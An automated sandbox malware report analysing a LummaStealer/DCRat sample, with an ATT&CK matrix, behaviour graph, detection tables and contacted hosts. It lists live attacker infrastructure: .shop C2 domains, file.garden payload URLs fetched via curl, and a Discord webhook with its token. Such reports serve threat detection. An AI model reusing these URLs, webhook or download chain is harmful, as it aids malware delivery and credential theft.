                                PowerShell
                                RC ScriptsRC Scripts1
                                File Deletion
                                Cached Domain Credentials2
                                Process Discovery
                                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items132
                                Masquerading
                                DCSync1
                                Application Window Discovery
                                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job241
                                Virtualization/Sandbox Evasion
                                Proc Filesystem1
                                Remote System Discovery
                                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt411
                                Process Injection
                                /etc/passwd and /etc/shadow1
                                System Network Configuration Discovery
                                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1522823 Sample: gh3zRWl4or.exe Startdate: 30/09/2024 Architecture: WINDOWS Score: 100 132 tiddymarktwo.shop 2->132 134 tendencerangej.shop 2->134 136 10 other IPs or domains 2->136 144 Suricata IDS alerts for network traffic 2->144 146 Found malware configuration 2->146 148 Antivirus detection for URL or domain 2->148 150 17 other signatures 2->150 13 gh3zRWl4or.exe 2 2->13         started        16 LBUPSPkYsNXrxZEtdVzCng.exe 2->16         started        19 msedge.exe 2->19         started        21 6 other processes 2->21 signatures3 process4 file5 176 Tries to detect sandboxes and other dynamic analysis tools (window names) 13->176 178 Drops executables to the windows directory (C:\Windows) and starts them 13->178 180 Hides threads from debuggers 13->180 182 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 13->182 23 kdmapper.exe 3 6 13->23         started        27 physmeme.exe 2 13->27         started        29 cmd.exe 1 13->29         started        35 2 other processes 13->35 96 C:\Users\user\Desktop\uNKjQhPt.log, PE32 16->96 dropped 98 C:\Users\user\Desktop\dZblWXPP.log, PE32 16->98 dropped 100 C:\Users\user\Desktop\aowVPJEW.log, PE32 16->100 dropped 108 3 other malicious files 16->108 dropped 31 cmd.exe 16->31         started        102 C:\Users\user\Desktop\xSuJhsEU.log, PE32 19->102 dropped 104 C:\Users\user\Desktop\sozKoiId.log, PE32 19->104 dropped 106 C:\Users\user\Desktop\ZcXEVMnO.log, PE32 19->106 dropped 110 3 other malicious files 19->110 dropped 33 cmd.exe 19->33         started        184 Antivirus detection for dropped file 21->184 186 Multi AV Scanner detection for dropped file 21->186 188 Machine Learning detection for dropped file 21->188 signatures6 process7 file8 116 C:dge\msedge.exe, PE32 23->116 dropped 118 C:dge\L6lFlVnd0szYUYb26bZc.vbe, data 23->118 dropped 162 Multi AV Scanner detection for dropped file 23->162 37 wscript.exe 1 23->37         started        164 Contains functionality to inject code into remote processes 27->164 166 Uses schtasks.exe or at.exe to add and modify task schedules 27->166 168 Writes to foreign memory regions 27->168 174 3 other signatures 27->174 40 RegAsm.exe 27->40         started        43 conhost.exe 27->43         started        45 schtasks.exe 27->45         started        170 Uses ping.exe to sleep 29->170 172 Uses ping.exe to check the status of other devices and networks 29->172 47 curl.exe 2 29->47         started        50 conhost.exe 31->50         started        54 3 other processes 31->54 56 3 other processes 33->56 52 curl.exe 2 35->52         started        signatures9 process10 dnsIp11 158 Windows Scripting host queries suspicious COM object (likely to drop second stage) 37->158 160 Suspicious execution chain found 37->160 58 cmd.exe 1 37->58         started        138 steamcommunity.com 104.102.49.254, 443, 65264 AKAMAI-ASUS United States 40->138 140 file.garden 188.114.96.3, 443, 49701, 49704 CLOUDFLARENETUS European Union 47->140 142 127.0.0.1 unknown unknown 47->142 128 C:\Windows\Speech\kdmapper.exe, PE32 47->128 dropped 130 C:\Windows\Speech\physmeme.exe, PE32 52->130 dropped file12 signatures13 process14 process15 60 msedge.exe 6 26 58->60         started        64 conhost.exe 58->64         started        file16 120 C:\Users\user\Desktop\vpYzbqhQ.log, PE32 60->120 dropped 122 C:\Users\user\Desktop\fnSuHmrC.log, PE32 60->122 dropped 124 C:\Users\user\Desktop\XkTUfoHN.log, PE32 60->124 dropped 126 5 other malicious files 60->126 dropped 190 Antivirus detection for dropped file 60->190 192 Multi AV Scanner detection for dropped file 60->192 194 Creates an undocumented autostart registry key 60->194 196 4 other signatures 60->196 66 csc.exe 60->66         started        70 csc.exe 60->70         started        72 cmd.exe 60->72         started        74 2 other processes 60->74 signatures17 process18 file19 112 C:\Windows\...\SecurityHealthSystray.exe, PE32 66->112 dropped 152 Infects executable files (exe, dll, sys, html) 66->152 76 cvtres.exe 66->76         started        78 conhost.exe 66->78         started        114 C:\Program Files (x86)\...\msedge.exe, PE32 70->114 dropped 80 conhost.exe 70->80         started        82 cvtres.exe 70->82         started        154 Uses ping.exe to sleep 72->154 84 conhost.exe 72->84         started        92 3 other processes 72->92 156 Loading BitLocker PowerShell Module 74->156 86 conhost.exe 74->86         started        88 conhost.exe 74->88         started        90 WmiPrvSE.exe 74->90         started        signatures20 process21 process22 94 Conhost.exe 76->94         started       

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand
                                SourceDetectionScannerLabelLink
                                gh3zRWl4or.exe55%ReversingLabsWin64.Spyware.Lummastealer
                                gh3zRWl4or.exe100%AviraHEUR/AGEN.1317356
                                SourceDetectionScannerLabelLink
                                C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe100%AviraHEUR/AGEN.1323342
                                C:\Edge\L6lFlVnd0szYUYb26bZc.vbe100%AviraVBS/Runner.VPG
                                C:\Users\user\Desktop\ASIzYbXK.log100%AviraTR/AVI.Agent.updqb
                                C:\Edge\msedge.exe100%AviraHEUR/AGEN.1323342
                                C:\Users\user\Desktop\KAbPIEds.log100%AviraTR/PSW.Agent.qngqt
                                C:\Users\user\AppData\Local\Temp\W7vO5ocqvr.bat100%AviraBAT/Delbat.C
                                C:\Users\user\Desktop\dZblWXPP.log100%AviraTR/PSW.Agent.qngqt
                                C:\Users\user\Desktop\HiOQLkRz.log100%AviraTR/AVI.Agent.updqb
                                C:\Users\user\AppData\Local\Temp\Cb8ciTnPhW.bat100%AviraBAT/Delbat.C
                                C:\Users\user\Desktop\TqIVmuJi.log100%AviraTR/AVI.Agent.updqb
                                C:\Users\user\AppData\Local\Temp\NnkzcdwAFb.bat100%AviraBAT/Delbat.C
                                C:\Users\user\Desktop\XkTUfoHN.log100%AviraTR/PSW.Agent.qngqt
                                C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe100%Joe Sandbox ML
                                C:\Edge\msedge.exe100%Joe Sandbox ML
                                C:\Users\user\Desktop\fnSuHmrC.log100%Joe Sandbox ML
                                C:\Users\user\Desktop\aowVPJEW.log100%Joe Sandbox ML
                                C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe100%Joe Sandbox ML
                                C:\Users\user\Desktop\ZcXEVMnO.log100%Joe Sandbox ML
                                C:\Users\user\Desktop\BegQTYoT.log100%Joe Sandbox ML
                                C:\Users\user\Desktop\KAbPIEds.log100%Joe Sandbox ML
                                C:\Users\user\Desktop\dZblWXPP.log100%Joe Sandbox ML
                                C:\Users\user\Desktop\XkTUfoHN.log100%Joe Sandbox ML
                                C:\Edge\msedge.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\Desktop\ASIzYbXK.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\Desktop\BegQTYoT.log25%ReversingLabsWin32.Trojan.Generic
                                C:\Users\user\Desktop\HiOQLkRz.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\Desktop\KAbPIEds.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\Desktop\OPvxZeSl.log29%ReversingLabs
                                C:\Users\user\Desktop\TqIVmuJi.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\Desktop\XkTUfoHN.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\Desktop\ZcXEVMnO.log8%ReversingLabs
                                C:\Users\user\Desktop\aowVPJEW.log8%ReversingLabs
                                C:\Users\user\Desktop\dZblWXPP.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\Desktop\fnSuHmrC.log8%ReversingLabs
                                C:\Users\user\Desktop\sozKoiId.log25%ReversingLabsWin32.Trojan.Generic
                                C:\Users\user\Desktop\uNKjQhPt.log29%ReversingLabs
                                C:\Users\user\Desktop\vpYzbqhQ.log25%ReversingLabsWin32.Trojan.Generic
                                C:\Users\user\Desktop\xSuJhsEU.log29%ReversingLabs
                                C:\Windows\Speech\kdmapper.exe68%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Windows\Speech\physmeme.exe61%ReversingLabsByteCode-MSIL.Trojan.LummaStealer
                                No Antivirus matches
                                No Antivirus matches
                                SourceDetectionScannerLabelLink
                                https://player.vimeo.com0%URL Reputationsafe
                                https://community.akamai.steamstatic.com/0%URL Reputationsafe
                                https://contoso.com/License0%URL Reputationsafe
                                https://www.gstatic.cn/recaptcha/0%URL Reputationsafe
                                http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                                https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
                                https://recaptcha.net/recaptcha/;0%URL Reputationsafe
                                https://medal.tv0%URL Reputationsafe
                                https://broadcast.st.dl.eccdnx.com0%URL Reputationsafe
                                https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%URL Reputationsafe
                                https://contoso.com/0%URL Reputationsafe
                                https://nuget.org/nuget.exe0%URL Reputationsafe
                                https://login.steampowered.com/0%URL Reputationsafe
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                                https://store.steampowered.com/legal/0%URL Reputationsafe
                                https://steam.tv/0%URL Reputationsafe
                                http://nuget.org/NuGet.exe0%URL Reputationsafe
                                https://steamcommunity.com/profiles/76561199724331900100%URL Reputationmalware
                                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                                http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                                http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                                https://contoso.com/Icon0%URL Reputationsafe
                                https://recaptcha.net0%URL Reputationsafe
                                https://store.steampowered.com/0%URL Reputationsafe
                                https://lv.queniujq.cn0%URL Reputationsafe
                                http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                                https://checkout.steampowered.com/0%URL Reputationsafe
                                https://help.steampowered.com/0%URL Reputationsafe
                                https://api.steampowered.com/0%URL Reputationsafe
                                http://store.steampowered.com/account/cookiepreferences/0%URL Reputationsafe
                                https://aka.ms/pscore680%URL Reputationsafe
                                https://store.steampowered.com/;0%URL Reputationsafe
                                NameIPActiveMaliciousAntivirus DetectionReputation
                                steamcommunity.com
                                104.102.49.254
                                truefalse
                                  unknown
                                  file.garden
                                  188.114.96.3
                                  truefalse
                                    unknown
                                    fossillargeiw.shop
                                    unknown
                                    unknowntrue
                                      unknown
                                      strappystyio.shop
                                      unknown
                                      unknowntrue
                                        unknown
                                        tiddymarktwo.shop
                                        unknown
                                        unknowntrue
                                          unknown
                                          coursedonnyre.shop
                                          unknown
                                          unknowntrue
                                            unknown
                                            captainynfanw.shop
                                            unknown
                                            unknowntrue
                                              unknown
                                              tearrybyiwo.shop
                                              unknown
                                              unknowntrue
                                                unknown
                                                zelensky.top
                                                unknown
                                                unknownfalse
                                                  unknown
                                                  surveriysiop.shop
                                                  unknown
                                                  unknowntrue
                                                    unknown
                                                    appleboltelwk.shop
                                                    unknown
                                                    unknowntrue
                                                      unknown
                                                      tendencerangej.shop
                                                      unknown
                                                      unknowntrue
                                                        unknown
                                                        NameMaliciousAntivirus DetectionReputation
                                                        coursedonnyre.shoptrue
                                                          unknown
                                                          https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.binfalse
                                                            unknown
                                                            strappystyio.shoptrue
                                                              unknown
                                                              tearrybyiwo.shoptrue
                                                                unknown
                                                                https://steamcommunity.com/profiles/76561199724331900true
                                                                • URL Reputation: malware
                                                                unknown
                                                                https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.binfalse
                                                                  unknown
                                                                  captainynfanw.shoptrue
                                                                    unknown
                                                                    fossillargeiw.shoptrue
                                                                      unknown
                                                                      tiddymarktwo.shoptrue
                                                                        unknown
                                                                        surveriysiop.shoptrue
                                                                          unknown
                                                                          appleboltelwk.shoptrue
                                                                            unknown
                                                                            tendencerangej.shoptrue
                                                                              unknown
                                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                                              https://player.vimeo.comRegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://community.akamai.steamstatic.com/RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://www.microsoft.copowershell.exe, 0000001D.00000002.1814705608.000002AB18ABC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://contoso.com/Licensepowershell.exe, 0000001E.00000002.1758661770.0000017B40ACD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin$curl.exe, 00000005.00000002.1348744210.0000025E1A767000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://www.gstatic.cn/recaptcha/RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://store.steampowered.com/subscriber_agreement/RegAsm.exe, 0000000C.00000002.1399125036.0000000001456000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgRegAsm.exe, 0000000C.00000002.1399125036.0000000001456000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6RegAsm.exe, 0000000C.00000002.1399125036.0000000001456000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.binDjcurl.exe, 00000008.00000002.1365439765.000001D6FD257000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        https://recaptcha.net/recaptcha/;RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://steamcommunity.com/profiles/76561199724331900A&RegAsm.exe, 0000000C.00000002.1399217916.0000000001462000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                          unknown
                                                                                          https://www.youtube.comRegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://www.google.comRegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              http://www.w3.LBUPSPkYsNXrxZEtdVzCng.exe, 00000032.00000002.2023378514.000000000289F000.00000004.00000800.00020000.00000000.sdmp, LBUPSPkYsNXrxZEtdVzCng.exe, 00000033.00000002.1970639828.0000000002AFF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://medal.tvRegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                https://broadcast.st.dl.eccdnx.comRegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1RegAsm.exe, 0000000C.00000002.1399125036.0000000001456000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://zelensky.topLBUPSPkYsNXrxZEtdVzCng.exe, 00000025.00000002.1765228400.0000000002A35000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000036.00000002.2001097433.00000000031E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  https://contoso.com/powershell.exe, 0000001E.00000002.1758661770.0000017B40ACD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://discord.com/api/webhooks/1247249666907701321/mhniI9J0YWG308w-rJbT6rxKaLF0IflJIgI4sGWLEdUFWwOgh3zRWl4or.exefalse
                                                                                                    unknown
                                                                                                    https://nuget.org/nuget.exepowershell.exe, 0000001D.00000002.1752800619.000002AB106AD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1758661770.0000017B40ACD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://auth.gg/gh3zRWl4or.exefalse
                                                                                                      unknown
                                                                                                      http://crl.micft.cMicRosofpowershell.exe, 0000001D.00000002.1804832305.000002AB18732000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        http://zelensky.top/msedge.exe, 00000036.00000002.2001097433.00000000031E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          http://zelensky.top/RequestlongpolllinuxTrafficlocalpublicUploads.phpLBUPSPkYsNXrxZEtdVzCng.exe, 00000025.00000002.1765228400.0000000002A35000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000036.00000002.2001097433.00000000031E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            https://s.ytimg.com;RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              https://login.steampowered.com/RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namemsedge.exe, 00000010.00000002.1577856617.0000000003522000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1623807747.000002AB00641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1624227305.0000017B30A61000.00000004.00000800.00020000.00000000.sdmp, LBUPSPkYsNXrxZEtdVzCng.exe, 00000025.00000002.1765228400.0000000002A35000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000036.00000002.2001097433.00000000031E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin--outputC:curl.exe, 00000008.00000002.1365439765.000001D6FD257000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                https://store.steampowered.com/legal/RegAsm.exe, 0000000C.00000002.1399125036.0000000001456000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                https://steam.tv/RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://www.houseindustries.com/licensegh3zRWl4or.exefalse
                                                                                                                  unknown
                                                                                                                  http://www.houseindustries.com/licenseBurbankgh3zRWl4or.exefalse
                                                                                                                    unknown
                                                                                                                    http://nuget.org/NuGet.exepowershell.exe, 0000001D.00000002.1752800619.000002AB106AD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1758661770.0000017B40ACD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://www.houseindustries.comhttp://www.talleming.comHousegh3zRWl4or.exefalse
                                                                                                                      unknown
                                                                                                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000001E.00000002.1624227305.0000017B30C88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      https://steamcommunity.com/i&RegAsm.exe, 0000000C.00000002.1399217916.0000000001462000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000001D.00000002.1623807747.000002AB00869000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1624227305.0000017B30C88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000001E.00000002.1624227305.0000017B30C88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          http://store.steampowered.com/privacy_agreement/RegAsm.exe, 0000000C.00000002.1399125036.0000000001456000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          http://crl.micpowershell.exe, 0000001D.00000002.1804832305.000002AB18732000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://contoso.com/Iconpowershell.exe, 0000001E.00000002.1758661770.0000017B40ACD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://recaptcha.netRegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://store.steampowered.com/RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.binJcurl.exe, 00000005.00000002.1348744210.0000025E1A79B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000003.1348353534.0000025E1A79A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              https://steamcommunity.comRegAsm.exe, 0000000C.00000002.1399125036.0000000001456000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                https://sketchfab.comRegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  https://lv.queniujq.cnRegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://www.youtube.com/RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    http://127.0.0.1:27060RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      https://github.com/Pester/Pesterpowershell.exe, 0000001E.00000002.1624227305.0000017B30C88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin--outputC:curl.exe, 00000005.00000002.1348744210.0000025E1A767000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.binurlrccurl.exe, 00000008.00000002.1365439765.000001D6FD257000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            http://www.houseindustries.com/licenseCopyrightgh3zRWl4or.exefalse
                                                                                                                                              unknown
                                                                                                                                              https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTgRegAsm.exe, 0000000C.00000002.1399125036.0000000001456000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000001D.00000002.1623807747.000002AB00869000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1624227305.0000017B30C88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://www.google.com/recaptcha/RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://checkout.steampowered.com/RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://help.steampowered.com/RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://api.steampowered.com/RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://store.steampowered.com/account/cookiepreferences/RegAsm.exe, 0000000C.00000002.1399125036.0000000001456000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://aka.ms/pscore68powershell.exe, 0000001D.00000002.1623807747.000002AB00641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1624227305.0000017B30A61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://steamcommunity.com/RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.1399217916.0000000001480000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    https://store.steampowered.com/;RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                    • 75% < No. of IPs
                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                    188.114.96.3
                                                                                                                                                    file.gardenEuropean Union
                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                    104.102.49.254
                                                                                                                                                    steamcommunity.comUnited States
                                                                                                                                                    16625AKAMAI-ASUSfalse
                                                                                                                                                    IP
                                                                                                                                                    127.0.0.1
                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                    Analysis ID:1522823
                                                                                                                                                    Start date and time:2024-09-30 18:18:07 +02:00
                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                    Overall analysis duration:0h 12m 53s
                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                    Report type:full
                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                    Number of analysed new started processes analysed:63
                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                    Technologies:
                                                                                                                                                    • HCA enabled
                                                                                                                                                    • EGA enabled
                                                                                                                                                    • AMSI enabled
                                                                                                                                                    Analysis Mode:default
                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                    Sample name:gh3zRWl4or.exe
                                                                                                                                                    renamed because original name is a hash value
                                                                                                                                                    Original Sample Name:77a592b9f5d0706eb93369d646deb8915303bdc725619c24378dfd3db1ca2ed2.exe
                                                                                                                                                    Detection:MAL
                                                                                                                                                    Classification:mal100.spre.troj.expl.evad.winEXE@79/58@16/3
                                                                                                                                                    EGA Information:
                                                                                                                                                    • Successful, ratio: 23.5%
